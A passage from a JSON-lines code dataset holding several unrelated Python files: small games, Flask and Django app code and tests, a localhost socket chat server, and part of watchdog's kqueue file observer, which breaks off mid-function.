print('-+-+-')\n print(f\"{board['bl']}|{board['bm']}|{board['br']}\")\n\ndef run_turn(player, board):\n new_board = copy(board)\n while True:\n turn = input(f'Player {player}, where do you want to play? ')\n pos = board[turn]\n if pos == ' ':\n new_board[turn] = player\n break\n else:\n print('That space is not empty.')\n return ('X' if player == 'O' else 'O', new_board)\n\nprint_board(board)\nfor i in range(9):\n player, board = run_turn(player, board)\n print_board(board)\n\n","repo_name":"dave-burke/python-sample","sub_path":"tictactoe.py","file_name":"tictactoe.py","file_ext":"py","file_size_in_byte":857,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73805577124","text":"import pytz\nfrom datetime import datetime, timedelta, timezone\nfrom DB_Schema.DB_Connect import session, exc, text\n\n\n# Piece-wise constant interpolation method (take previous poll status)\n\n# a ,b ,c ,d (polls)\n# + ,- ,+ ,+ (active +, inactive -)\n\n# a -> b +\n# b -> c -\n# c -> d +\n\ndef getUpDownTime(start, end, polls):\n \n status = [None]\n times = [start]\n \n filtered_listOfDicts = []\n for poll in polls:\n parsedTime = parse(poll['p2'])\n if parsedTime>=start and parsedTime<=end:\n filtered_listOfDicts.append((poll['p1'],parsedTime))\n \n for poll in filtered_listOfDicts:\n status.append(poll[0])\n times.append(poll[1])\n \n status.append(None)\n times.append(end)\n \n # Interpolation\n uptime = 0\n downtime = 0\n for i in range(1,len(status)):\n diffInMins=timeDiffMinutes(times[i-1],times[i])\n if status[i-1]=='active':\n uptime+=diffInMins\n elif status[i-1]=='inactive':\n downtime+=diffInMins\n elif status[i-1]==None:\n pass\n \n return uptime, downtime\n\n# Takes two times and returns difference in minutes\ndef timeDiffMinutes(time1_obj, time2_obj):\n diff = time2_obj - time1_obj\n diff_minutes = diff.total_seconds() / 60.0\n return diff_minutes\n\n# Handles different datetime formats\ndef parse(time_str):\n res = time_str.split('.')\n if len(res)==2:\n lres=len(res[1])\n if lres<6:\n for i in range(6-lres):\n res[1]+='0'\n time_str=res[0]+'.'+res[1]\n \n datetime_obj = datetime.fromisoformat(time_str.replace('Z', '+00:00'))\n return datetime_obj\n\n# Get all data at once - storeid, timezone, polls-aggregate-object [Grouped by storeid]\ndef getPollsWeek(db):\n try:\n query = text(\"SELECT t.store_id, \\\n coalesce(store_timezone.timezone_str,'America/Chicago'), \\\n jsonb_build_object( \\\n '2023-01-19', jsonb_agg( \\\n json_build_object('p1', p1, 'p2', p2) ORDER BY p2 \\\n ) FILTER (WHERE DATE(p2) = '2023-01-19'), \\\n '2023-01-20', jsonb_agg( \\\n json_build_object('p1', p1, 'p2', p2) ORDER BY p2 \\\n ) FILTER (WHERE DATE(p2) = '2023-01-20'), \\\n '2023-01-21', jsonb_agg( \\\n json_build_object('p1', p1, 'p2', p2) ORDER BY p2 \\\n ) FILTER (WHERE DATE(p2) = '2023-01-21'), \\\n '2023-01-22', jsonb_agg( \\\n json_build_object('p1', p1, 'p2', p2) ORDER BY p2 \\\n ) FILTER (WHERE DATE(p2) = '2023-01-22'), \\\n '2023-01-23', jsonb_agg( \\\n json_build_object('p1', p1, 'p2', p2) ORDER BY p2 \\\n ) FILTER (WHERE DATE(p2) = '2023-01-23'), \\\n '2023-01-24', jsonb_agg( \\\n json_build_object('p1', p1, 'p2', p2) ORDER BY p2 \\\n ) FILTER (WHERE DATE(p2) = '2023-01-24'), \\\n '2023-01-25', jsonb_agg( \\\n json_build_object('p1', p1, 'p2', p2) ORDER BY p2 \\\n ) FILTER (WHERE DATE(p2) = '2023-01-25') \\\n ) as status_timestamps \\\n FROM ( \\\n SELECT ss.store_id, \\\n status AS p1, \\\n timestamp_utc AS p2 \\\n FROM store_status ss \\\n WHERE timestamp_utc >= '2023-01-18 00:00:00' AND timestamp_utc <= '2023-01-25 23:59:59' \\\n WINDOW w AS (PARTITION BY ss.store_id) \\\n ) AS t \\\n JOIN store_timezone ON t.store_id = store_timezone.store_id \\\n GROUP BY t.store_id, store_timezone.timezone_str \\\n ORDER BY t.store_id\")\n \n response = db.execute(query).fetchall() \n db.commit()\n\n return response\n except exc.SQLAlchemyError as e:\n return e\n \n# Get all data at once - storeid, aggregate-Menu_hours-object\ndef getIntervalsWeekNew(db):\n try:\n query = text(\"SELECT store_id, \\\n json_object_agg(CAST(dayofweek AS text), agg_array ORDER BY dayofweek) AS agg_object \\\n FROM ( \\\n SELECT store_id, dayofweek, ARRAY_AGG(ARRAY[start_time_local, end_time_local] ORDER BY start_time_local) AS agg_array \\\n FROM menu_hours \\\n GROUP BY store_id, dayofweek \\\n ) subquery \\\n GROUP BY store_id \\\n ORDER BY store_id\")\n \n response = db.execute(query).fetchall() \n db.commit()\n\n return response\n except exc.SQLAlchemyError as e:\n return e\n\n# Merge overlapping intervals\ndef listOflistsMergeIntervals(intervals):\n # Convert time strings to datetime objects for easier comparison\n for interval in intervals:\n if type(interval[0]) == str:\n interval[0] = datetime.strptime(interval[0], \"%H:%M:%S\")\n if type(interval[1]) == str:\n interval[1] = datetime.strptime(interval[1], \"%H:%M:%S\")\n\n # Sort the intervals by the start time [Already sorted from database]\n # intervals.sort(key=lambda interval: interval[0])\n merged_intervals = []\n for interval in intervals:\n if not merged_intervals or merged_intervals[-1][1] < interval[0]:\n # If the current interval doesn't overlap with the previous one, add it to the list\n merged_intervals.append(interval)\n else:\n # If the current interval overlaps with the previous one, merge them\n merged_intervals[-1][1] = max(merged_intervals[-1][1], interval[1])\n\n # Convert datetime objects back to time strings\n for interval in merged_intervals:\n interval[0] = interval[0].strftime(\"%H:%M:%S\")\n interval[1] = interval[1].strftime(\"%H:%M:%S\")\n\n return merged_intervals\n\n# Type casting utilities\ndef convertToLocal_withFloat(time_string, zone):\n return datetime.strptime(time_string, '%Y-%m-%d %H:%M:%S.%f').replace(tzinfo=pytz.utc).astimezone(pytz.timezone(zone)).strftime('%Y-%m-%d %H:%M:%S')\n\ndef convertToLocal(time_string, zone):\n return datetime.strptime(time_string, '%Y-%m-%d %H:%M:%S').replace(tzinfo=pytz.utc).astimezone(pytz.timezone(zone)).strftime('%Y-%m-%d %H:%M:%S')\n\ndef convertToLocal_T(time_string, zone):\n meta = time_string.split('.')\n if len(meta)<=1:\n return datetime.strptime(time_string, '%Y-%m-%dT%H:%M:%S').replace(tzinfo=pytz.utc).astimezone(pytz.timezone(zone)).strftime('%Y-%m-%d %H:%M:%S')\n return datetime.strptime(time_string, '%Y-%m-%dT%H:%M:%S.%f').replace(tzinfo=pytz.utc).astimezone(pytz.timezone(zone)).strftime('%Y-%m-%d %H:%M:%S')\n","repo_name":"tanmaybisen/loop-assignment-01","sub_path":"routes/helperFunctions.py","file_name":"helperFunctions.py","file_ext":"py","file_size_in_byte":6745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"18898362344","text":"from flask import render_template, flash, redirect, url_for, request, session\nfrom app import app\nfrom app.forms import LoginForm\n\n\nfrom flask_login import current_user, login_user, logout_user, login_required\nfrom app.models import User\n\nfrom app import db\nfrom app.forms import RegistrationForm\n\nimport pygal\nfrom pygal.style import Style\n\nfrom werkzeug.urls import url_parse\n\n\n\nimport mongo_queries\n\n\nimport pandas as pd\n\nimport plotly\nimport plotly.express as px\nimport json\n\n\n\n\n@app.route('/')\n\n\n@app.route('/index')\n@login_required\ndef index():\n\n queries = [\n {\n \"number\" : 1,\n \"body\": \"All members who took a loan in XX, according to category Y.\",\n \"access_type\":0\n },\n {\n \"number\" : 2,\n \"body\": \"List of payments made by employees of company XX and whose credit provider resides in Savannah.\",\n \"access_type\":0\n },\n {\n \"number\" : 3,\n \"body\": \"List of members who have contracted a category XX loan and who live in a street with the word YY in it.\",\n \"access_type\":0\n },\n {\n \"number\" : 4,\n \"body\": \"Member with a capital greater than XX $, having taken a loan from a provider YY, and whose telephone number and the one of the provider end with the same numbers.\",\n \"access_type\":0\n },\n {\n \"number\" : 5,\n \"body\": \"Corporation whose employees are indebted and must repay their loans as quickly as possible.\",\n \"access_type\":1\n },\n {\n \"number\" : 6,\n \"body\": \"By category, name of the provider that provides the most liquidity.\",\n \"access_type\":1\n },\n {\n \"number\" : 7,\n \"body\": \"Average time required for a member to repay a loan (already paid) by range of credit contracted. TAKE TIMES TO COMPUTE\",\n \"access_type\":1\n },\n {\n \"number\" : 8,\n \"body\": \"Average interest rate of each provider, by category.\",\n \"access_type\":1\n },\n ]\n\n return render_template('index.html', title='Home Page', queries=queries)\n\n\n@app.route('/register', methods=['GET', 'POST'])\ndef register():\n if current_user.is_authenticated:\n return redirect(url_for('index'))\n form = RegistrationForm()\n if form.validate_on_submit():\n user = User(username=form.username.data, email=form.email.data, access_type=form.access_type.data)\n user.set_password(form.password.data)\n db.session.add(user)\n db.session.commit()\n flash('Congratulations, you are now a registered user!')\n return redirect(url_for('login'))\n return render_template('register.html', title='Register', form=form)\n\n\n@app.route('/login', methods=['GET', 'POST'])\ndef login():\n if current_user.is_authenticated:\n return redirect(url_for('index'))\n form = LoginForm()\n if form.validate_on_submit():\n user = User.query.filter_by(username=form.username.data).first()\n if user is None or not user.check_password(form.password.data):\n flash('Invalid username or password')\n return redirect(url_for('login'))\n login_user(user, remember=form.remember_me.data)\n next_page = request.args.get('next')\n if not next_page or url_parse(next_page).netloc != '':\n next_page = url_for('index')\n return redirect(next_page)\n return render_template('login.html', title='Sign In', form=form)\n\n\n@app.route('/logout')\ndef logout():\n logout_user()\n return redirect(url_for('index'))\n\n\n@app.route('/q1', methods =[\"GET\", \"POST\"])\ndef q1():\n\n if request.method == \"POST\":\n \n category = request.form.get(\"category\")\n year = request.form.get(\"year\")\n\n res = mongo_queries.query_1(category, year)\n \n return render_template('q1.html', title='Query 1', res=res)\n \n return render_template(\"q1.html\")\n\n\n@app.route('/q2', methods =[\"GET\", \"POST\"])\ndef q2():\n\n if request.method == \"POST\":\n \n corp_name = request.form.get(\"corp\")\n #city = request.form.get(\"city\")\n\n res = mongo_queries.query_2(corp_name)\n \n return render_template('q2.html', title='Query 2', res=res)\n \n return render_template(\"q2.html\")\n\n\n@app.route('/q3', methods =[\"GET\", \"POST\"])\ndef q3():\n\n if request.method == \"POST\":\n \n category = request.form.get(\"category\")\n street = request.form.get(\"street\")\n\n res = mongo_queries.query_3(category, street)\n \n return render_template('q3.html', title='Query 3', res=res)\n \n return render_template(\"q3.html\")\n\n\n@app.route('/q4', methods =[\"GET\", \"POST\"])\ndef q4():\n\n if request.method == \"POST\":\n \n capital = request.form.get(\"capital\")\n provider = request.form.get(\"provider\")\n\n res = mongo_queries.query_4(capital, provider)\n \n return render_template('q4.html', title='Query 4', res=res)\n \n return render_template(\"q4.html\")\n\n\n@app.route('/q5')\ndef q5():\n\n if current_user.access_type>=1:\n \n res = mongo_queries.query_5() \n return render_template('q5.html', title='Query 5', res=res)\n\n else:\n return render_template('denied.html')\n\n@app.route('/q6') \ndef q6():\n\n if current_user.access_type>=1:\n\n res = mongo_queries.query_6()\n\n #Collect all the informations to plot\n\n data = pd.json_normalize(res)\n\n fig = px.bar(data, x='_id', y='maxi.amount', color='maxi.provider_name', barmode='group', title = 'By category, name of the provider that provides the most liquidity.',\n \n labels={\n \"_id\": \"Credit category\",\n \"maxi.provider_name\": \"Provider name\",\n \"maxi.amount\": \"Amount provided\"\n }\n \n )\n\n graphJSON = json.dumps(fig, cls=plotly.utils.PlotlyJSONEncoder)\n\n\n return render_template('q6.html', graphJSON = graphJSON, res=res)\n\n else:\n return render_template('denied.html')\n\n\n@app.route('/q7') \ndef q7():\n\n if current_user.access_type>=1:\n\n res = mongo_queries.query_7()\n\n for elem in res:\n elem['average_repayment_time'] = abs(elem['average_repayment_time'])\n\n #Collect all the informations to plot\n\n data = pd.json_normalize(res)\n fig = px.bar(data, x='_id', y='average_repayment_time', barmode='group', title = 'Average time required for a member to repay a loan (already paid) by range of credit contracted.',\n \n labels={\n \"_id\": \"Credit range in $\",\n \"average_repayment_time\": \"Average time in days\"\n }\n \n )\n\n graphJSON = json.dumps(fig, cls=plotly.utils.PlotlyJSONEncoder)\n\n return render_template('q7.html', title='Query 7', res=res, graphJSON = graphJSON)\n\n else:\n return render_template('denied.html')\n\n\n@app.route('/q8') \ndef q8():\n\n if current_user.access_type>=1:\n\n res = mongo_queries.query_8()\n #Collect all the informations to plot\n\n data = pd.json_normalize(res)\n fig = px.bar(data, x='category', y='monthly_rate', color='provider_no', title = 'Average interest rate of each provider, by category.',\n \n labels={\n \"category\": \"Credit loan category\",\n \"monthly_rate\": \"Monthly rate (%)\"\n }\n \n )\n\n graphJSON = json.dumps(fig, cls=plotly.utils.PlotlyJSONEncoder)\n\n return render_template('q8.html', title='Query 8', res=res, graphJSON = graphJSON)\n\n else:\n return render_template('denied.html')\n\n\n@app.route('/admin') \ndef admin():\n\n if current_user.access_type>=2:\n\n collections = mongo_queries.get_list_collections()\n number_objects = mongo_queries.get_number_objects()\n avg_object_size = mongo_queries.get_avg_object_size()\n data_size = mongo_queries.get_data_size()\n indexes = mongo_queries.get_indexes()\n storage_size = mongo_queries.get_storage_size()\n num_collections = mongo_queries.get_number_collection()\n\n\n return render_template('admin.html', collections=collections, number_objects=number_objects,\n avg_object_size=avg_object_size, data_size = data_size, indexes = indexes,\n storage_size = storage_size, num_collections=num_collections)\n\n else:\n return render_template('denied.html')","repo_name":"Infrastructure-donnees-cloud/ESILV-A5-Infrastructure-de-donnees-cloud","sub_path":"app/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":8550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"45840046406","text":"from flask_nav.elements import *\nfrom app.helpers import current_user\n\n\ndef user_nav_item():\n\tuser = current_user()\n\tif not user:\n\t\treturn View('Login', 'login')\n\telse:\n\t\treturn Subgroup(user.full_name,\n\t\t\tView('View profile', 'users.view_single', user_id=user.id),\n\t\t\tSeparator(),\n\t\t\tView('Logout', 'logout'))\n\ndef navbar():\n\treturn Navbar(\n\t\tView('Genera', 'index'),\n\t\tView('Home', 'index'),\n\t\tView('Users', 'users.view_all'),\n\t\tView('Events', 'events.view_all'),\n\t\tuser_nav_item())\n","repo_name":"peterctl/Genera-Flask","sub_path":"app/navigation.py","file_name":"navigation.py","file_ext":"py","file_size_in_byte":485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"19691745395","text":"import socket, select, threading, time\r\n\r\n# la fonction start_server va ouvrir un socket sur l'ip \"host\" et le port \"port\"\r\n# nb_waitlist est la file d'attente max des clients en attente de connexions\r\n# la fonction renvoi la socket serveur\r\ndef start_server(host,port,nb_waitlist):\r\n \r\n connexion_main = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n connexion_main.bind((host, port))\r\n connexion_main.listen(nb_waitlist)\r\n print(\"server listenning on host: \", host, \", port :\", port)\r\n\r\n return connexion_main\r\n\r\n# la fonction accept_new_client va accepter une nouvelle connexion\r\n# la fonction va renvoyer la nouvelle socket\r\ndef accept_new_client(connexion_main):\r\n connexion_with_client, client_infos = connexion_main.accept()\r\n print(client_infos)\r\n # Renvoi du socket du client accepté\r\n return connexion_with_client\r\n \r\n# la fonction lit un message d'une socket \"client\" et le renvoi décodé.\r\ndef read_message_from_client(client):\r\n BUFF_SIZE = 4096 # 4 KiB\r\n data = b''\r\n while True:\r\n part = client.recv(BUFF_SIZE)\r\n data += part\r\n if len(part) < BUFF_SIZE:\r\n # either 0 or end of data\r\n break\r\n return data.decode()\r\n\r\ndef broadcast_message(message, sockets, socket, connexion_main):\r\n for c in sockets:\r\n if c != socket and c != connexion_main:\r\n msg_send=message.encode()\r\n c.send(msg_send)\r\n \r\ndef close_sockets(sockets, connexion_main):\r\n # Fermeture des connexions donc des sockets\r\n for client in sockets:\r\n if client is not connexion_main:\r\n client.close()\r\n connexion_main.close() ## Fermeture du socket principal\r\n\r\ndef main():\r\n host = \"127.0.0.1\"\r\n port = 12807\r\n\r\n connexion_main = start_server(host, port, 5)\r\n\r\n server_up= True\r\n sockets = [connexion_main]\r\n\r\n while server_up: ## while True:\r\n \r\n # On écoute la liste des sockets\r\n # Les clients renvoyés par select sont ceux devant être lus (recv)\r\n # On attend là jusqu'a qu'une y est une connexion ou un message (timeout a 0)\r\n # On encadre l'appel à select.select dans un bloc try\r\n \r\n ### Autre scénario \r\n\r\n try:\r\n sockets_to_read, writable, errors = select.select(sockets,[], sockets, 0)\r\n except select.error:\r\n pass\r\n\r\n #on continue en séquence si pas d'erreurs\r\n else: \r\n for client_error in errors:\r\n sockets.remove(client_error)\r\n client_error.close()\r\n print(\"Client déconnecté du à une error\")\r\n # On parcourt la liste des clients à lire\r\n for socket in sockets_to_read:\r\n #Si la socket est la socket serveur, c'est une nouvelle connexion.\r\n if socket is connexion_main:\r\n new_client = accept_new_client(socket)\r\n # on l'ajoute au sockets à ecouter.\r\n sockets.append(new_client)\r\n\r\n # Sinon on est un client\r\n else:\r\n # On lit le message ecrit par le client.\r\n try:\r\n message = read_message_from_client(socket)\r\n except ConnectionError:\r\n socket.close()\r\n sockets.remove(socket)\r\n print(\"Client déconnecté\")\r\n else:\r\n if not message:\r\n socket.close()\r\n sockets.remove(socket)\r\n print(\"Client déconnecté\")\r\n else:\r\n print(\"recieved msg :\", message)\r\n broadcast_message(message, sockets, socket, connexion_main)\r\n if message.upper().endswith(\":FIN\"):\r\n server_up = False\r\n print(\"Fermeture des connexions par l'un des clients \")\r\n close_sockets(sockets, connexion_main)\r\n \r\n\r\nmain()\r\n","repo_name":"Syugeek/TP-Python","sub_path":"Serveur.py","file_name":"Serveur.py","file_ext":"py","file_size_in_byte":4101,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"16743666875","text":"import random \n\ndef ranact():\n\tact = random.choice(action)\n\treturn act\n\t\ndef inp():\n\tguss = input('Enter Your choice : (sang , kaghaz, gheichi) (\"s\" for score \"0\" for end)')\n\treturn guss\n\t\naction=['sang','kaghaz','gheichi']\ncscore=0\nscore=0\nx=1\nwhile x==1:\n\tcomputer = ranact()\n\tplayer = inp()\n\tif player==computer:\n\t\tprint('equal,computer choice was',computer)\n\telif player not in action:\n\t\t\tif player=='0':\n\t\t\t\tif int(score)>int(cscore) :\n\t\t\t\t\tprint('you win\\n scores:\\n your score : {}\\n computer score : {}'.format(score,cscore))\n\t\t\t\t\tbreak\n\t\t\t\telif int(score)= 0\n\ndef test_check_level():\n hero_xp = 400\n level = check_level(hero_xp)\n assert isinstance(level, int)\n assert level == 5\n\ndef test_final_boss_battle():\n hero_name = \"Izuku Midoriya\"\n hero_level = 10\n final_boss_result = final_boss_battle(hero_name, hero_level)\n assert isinstance(final_boss_result, bool)\n","repo_name":"OrangeJuice023/CS50P_2022","sub_path":"Final Project/test_project.py","file_name":"test_project.py","file_ext":"py","file_size_in_byte":875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72018605285","text":"from rest_framework.test import APIClient\nfrom testing.testcases import TestCase\nfrom comments.models import Comment\nfrom django.utils import timezone\n\nCOMMENT_URL = '/api/comments/'\nCOMMENT_DETAIL_URL = '/api/comments/{}/'\n\n\nclass CommentApiTests(TestCase):\n\n def setUp(self):\n self.user1 = self.create_user('user1')\n self.user1_client = APIClient()\n self.user1_client.force_authenticate(self.user1)\n\n self.user2 = self.create_user('user2')\n self.user2_client = APIClient()\n self.user2_client.force_authenticate(self.user2)\n\n self.tweet = self.create_tweet(self.user1)\n\n def test_create(self):\n response = self.anonymous_client.post(COMMENT_URL)\n self.assertEqual(response.status_code, 403)\n\n response = self.user1_client.post(COMMENT_URL)\n self.assertEqual(response.status_code, 400)\n\n response = self.user1_client.post(\n COMMENT_URL, {'tweet_id': self.tweet.id})\n self.assertEqual(response.status_code, 400)\n\n response = self.user1_client.post(COMMENT_URL, {'content': '1'})\n self.assertEqual(response.status_code, 400)\n\n # content too long\n response = self.user1_client.post(COMMENT_URL, {'tweet_id': self.tweet.id,\n 'content': '1' * 142, })\n self.assertEqual(response.status_code, 400)\n self.assertEqual('content' in response.data['errors'], True)\n\n response = self.user1_client.post(COMMENT_URL, {\n 'tweet_id': self.tweet.id,\n 'content': '1',\n })\n self.assertEqual(response.status_code, 201)\n self.assertEqual(response.data['user']['id'], self.user1.id)\n self.assertEqual(response.data['tweet_id'], self.tweet.id)\n self.assertEqual(response.data['content'], '1')\n\n def test_update(self):\n comment = self.create_comment(self.user1, self.tweet, 'original')\n another_tweet = self.create_tweet(self.user2)\n url = COMMENT_DETAIL_URL.format(comment.id)\n\n response = self.anonymous_client.put(url, {'content': 'new'})\n self.assertEqual(response.status_code, 403)\n\n response = self.user2_client.put(url, {'content': 'new'})\n self.assertEqual(response.status_code, 403)\n #\n comment.refresh_from_db()\n self.assertNotEqual(comment.content, 'new')\n # only update content\n before_updated_at = comment.updated_at\n before_created_at = comment.created_at\n now = timezone.now()\n response = self.user1_client.put(url, {\n 'content': 'new',\n 'user_id': self.user1.id,\n 'tweet_id': another_tweet.id,\n 'created_at': now,\n })\n self.assertEqual(response.status_code, 200)\n comment.refresh_from_db()\n self.assertEqual(comment.content, 'new')\n self.assertEqual(comment.user, self.user1)\n self.assertEqual(comment.tweet, self.tweet)\n self.assertEqual(comment.created_at, before_created_at)\n self.assertNotEqual(comment.created_at, now)\n self.assertNotEqual(comment.updated_at, before_updated_at)\n\n def test_destroy(self):\n comment = self.create_comment(self.user1, self.tweet)\n url = COMMENT_DETAIL_URL.format(comment.id)\n\n response = self.anonymous_client.delete(url)\n self.assertEqual(response.status_code, 403)\n\n response = self.user2_client.delete(url)\n self.assertEqual(response.status_code, 403)\n\n count = Comment.objects.count()\n response = self.user1_client.delete(url)\n self.assertEqual(response.status_code, 200)\n self.assertEqual(Comment.objects.count(), count - 1)\n","repo_name":"hwpanda/social-backend","sub_path":"comments/api/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":3713,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37024042161","text":"#Embedded file name: e:\\jenkins\\workspace\\client_SERENITY\\branches\\release\\SERENITY\\packages\\watchdog\\observers\\kqueue.py\r\nfrom __future__ import with_statement\r\nfrom watchdog.utils import platform\r\nimport threading\r\nimport errno\r\nimport sys\r\nimport stat\r\nimport os\r\nif sys.version_info < (2, 7, 0):\r\n import select_backport as select\r\nelse:\r\n import select\r\nfrom pathtools.path import absolute_path\r\nfrom watchdog.observers.api import BaseObserver, EventEmitter, DEFAULT_OBSERVER_TIMEOUT, DEFAULT_EMITTER_TIMEOUT\r\nfrom watchdog.utils.dirsnapshot import DirectorySnapshot\r\nfrom watchdog.events import DirMovedEvent, DirDeletedEvent, DirCreatedEvent, DirModifiedEvent, FileMovedEvent, FileDeletedEvent, FileCreatedEvent, FileModifiedEvent, EVENT_TYPE_MOVED, EVENT_TYPE_DELETED, EVENT_TYPE_CREATED\r\nMAX_EVENTS = 4096\r\nO_EVTONLY = 32768\r\nif platform.is_darwin():\r\n WATCHDOG_OS_OPEN_FLAGS = O_EVTONLY\r\nelse:\r\n WATCHDOG_OS_OPEN_FLAGS = os.O_RDONLY | os.O_NONBLOCK\r\nWATCHDOG_KQ_FILTER = select.KQ_FILTER_VNODE\r\nWATCHDOG_KQ_EV_FLAGS = select.KQ_EV_ADD | select.KQ_EV_ENABLE | select.KQ_EV_CLEAR\r\nWATCHDOG_KQ_FFLAGS = select.KQ_NOTE_DELETE | select.KQ_NOTE_WRITE | select.KQ_NOTE_EXTEND | select.KQ_NOTE_ATTRIB | select.KQ_NOTE_LINK | select.KQ_NOTE_RENAME | select.KQ_NOTE_REVOKE\r\n\r\ndef is_deleted(kev):\r\n return kev.fflags & select.KQ_NOTE_DELETE\r\n\r\n\r\ndef is_modified(kev):\r\n fflags = kev.fflags\r\n return fflags & select.KQ_NOTE_EXTEND or fflags & select.KQ_NOTE_WRITE\r\n\r\n\r\ndef is_attrib_modified(kev):\r\n return kev.fflags & select.KQ_NOTE_ATTRIB\r\n\r\n\r\ndef is_renamed(kev):\r\n return kev.fflags & select.KQ_NOTE_RENAME\r\n\r\n\r\nclass KeventDescriptorSet(object):\r\n\r\n def __init__(self):\r\n self._descriptors = set()\r\n self._descriptor_for_path = dict()\r\n self._descriptor_for_fd = dict()\r\n self._kevents = list()\r\n self._lock = threading.Lock()\r\n\r\n @property\r\n def kevents(self):\r\n with self._lock:\r\n return self._kevents\r\n\r\n @property\r\n def paths(self):\r\n with self._lock:\r\n return list(self._descriptor_for_path.keys())\r\n\r\n def get_for_fd(self, fd):\r\n with self._lock:\r\n return self._descriptor_for_fd[fd]\r\n\r\n def get(self, path):\r\n with self._lock:\r\n path = absolute_path(path)\r\n return self._get(path)\r\n\r\n def __contains__(self, path):\r\n with self._lock:\r\n path = absolute_path(path)\r\n return self._has_path(path)\r\n\r\n def add(self, path, is_directory):\r\n with self._lock:\r\n path = absolute_path(path)\r\n if not self._has_path(path):\r\n self._add_descriptor(KeventDescriptor(path, is_directory))\r\n\r\n def remove(self, path):\r\n with self._lock:\r\n path = absolute_path(path)\r\n if self._has_path(path):\r\n self._remove_descriptor(self._get(path))\r\n\r\n def clear(self):\r\n with self._lock:\r\n for descriptor in self._descriptors:\r\n descriptor.close()\r\n\r\n self._descriptors.clear()\r\n self._descriptor_for_fd.clear()\r\n self._descriptor_for_path.clear()\r\n self._kevents = []\r\n\r\n def _get(self, path):\r\n return self._descriptor_for_path[path]\r\n\r\n def _has_path(self, path):\r\n return path in self._descriptor_for_path\r\n\r\n def _add_descriptor(self, descriptor):\r\n self._descriptors.add(descriptor)\r\n self._kevents.append(descriptor.kevent)\r\n self._descriptor_for_path[descriptor.path] = descriptor\r\n self._descriptor_for_fd[descriptor.fd] = descriptor\r\n\r\n def _remove_descriptor(self, descriptor):\r\n self._descriptors.remove(descriptor)\r\n del self._descriptor_for_fd[descriptor.fd]\r\n del self._descriptor_for_path[descriptor.path]\r\n self._kevents.remove(descriptor.kevent)\r\n descriptor.close()\r\n\r\n\r\nclass KeventDescriptor(object):\r\n\r\n def __init__(self, path, is_directory):\r\n self._path = absolute_path(path)\r\n self._is_directory = is_directory\r\n self._fd = os.open(path, WATCHDOG_OS_OPEN_FLAGS)\r\n self._kev = select.kevent(self._fd, filter=WATCHDOG_KQ_FILTER, flags=WATCHDOG_KQ_EV_FLAGS, fflags=WATCHDOG_KQ_FFLAGS)\r\n\r\n @property\r\n def fd(self):\r\n return self._fd\r\n\r\n @property\r\n def path(self):\r\n return self._path\r\n\r\n @property\r\n def kevent(self):\r\n return self._kev\r\n\r\n @property\r\n def is_directory(self):\r\n return self._is_directory\r\n\r\n def close(self):\r\n try:\r\n os.close(self.fd)\r\n except OSError:\r\n pass\r\n\r\n @property\r\n def key(self):\r\n return (self.path, self.is_directory)\r\n\r\n def __eq__(self, descriptor):\r\n return self.key == descriptor.key\r\n\r\n def __ne__(self, descriptor):\r\n return self.key != descriptor.key\r\n\r\n def __hash__(self):\r\n return hash(self.key)\r\n\r\n def __repr__(self):\r\n return '' % (self.path, self.is_directory)\r\n\r\n\r\nclass KqueueEmitter(EventEmitter):\r\n\r\n def __init__(self, event_queue, watch, timeout = DEFAULT_EMITTER_TIMEOUT):\r\n EventEmitter.__init__(self, event_queue, watch, timeout)\r\n self._kq = select.kqueue()\r\n self._lock = threading.RLock()\r\n self._descriptors = KeventDescriptorSet()\r\n\r\n def walker_callback(path, stat_info, self = self):\r\n self._register_kevent(path, stat.S_ISDIR(stat_info.st_mode))\r\n\r\n self._snapshot = DirectorySnapshot(watch.path, watch.is_recursive, walker_callback)\r\n\r\n def _register_kevent(self, path, is_directory):\r\n try:\r\n self._descriptors.add(path, is_directory)\r\n except OSError as e:\r\n if e.errno == errno.ENOENT:\r\n pass\r\n else:\r\n raise\r\n\r\n def _unregister_kevent(self, path):\r\n self._descriptors.remove(path)\r\n\r\n def queue_event(self, event):\r\n EventEmitter.queue_event(self, event)\r\n if event.event_type == EVENT_TYPE_CREATED:\r\n self._register_kevent(event.src_path, event.is_directory)\r\n elif event.event_type == EVENT_TYPE_MOVED:\r\n self._unregister_kevent(event.src_path)\r\n self._register_kevent(event.dest_path, event.is_directory)\r\n elif event.event_type == EVENT_TYPE_DELETED:\r\n self._unregister_kevent(event.src_path)\r\n\r\n def _queue_dirs_modified(self, dirs_modified, ref_snapshot, new_snapshot):\r\n if dirs_modified:\r\n for dir_modified in dirs_modified:\r\n self.queue_event(DirModifiedEvent(dir_modified))\r\n\r\n diff_events = new_snapshot - ref_snapshot\r\n for file_created in diff_events.files_created:\r\n self.queue_event(FileCreatedEvent(file_created))\r\n\r\n for directory_created in diff_events.dirs_created:\r\n self.queue_event(DirCreatedEvent(directory_created))\r\n\r\n def _queue_events_except_renames_and_dir_modifications(self, event_list):\r\n files_renamed = set()\r\n dirs_renamed = set()\r\n dirs_modified = set()\r\n for kev in event_list:\r\n descriptor = self._descriptors.get_for_fd(kev.ident)\r\n src_path = descriptor.path\r\n if is_deleted(kev):\r\n if descriptor.is_directory:\r\n self.queue_event(DirDeletedEvent(src_path))\r\n else:\r\n self.queue_event(FileDeletedEvent(src_path))\r\n elif is_attrib_modified(kev):\r\n if descriptor.is_directory:\r\n self.queue_event(DirModifiedEvent(src_path))\r\n else:\r\n self.queue_event(FileModifiedEvent(src_path))\r\n elif is_modified(kev):\r\n if descriptor.is_directory:\r\n dirs_modified.add(src_path)\r\n else:\r\n self.queue_event(FileModifiedEvent(src_path))\r\n elif is_renamed(kev):\r\n if descriptor.is_directory:\r\n dirs_renamed.add(src_path)\r\n else:\r\n 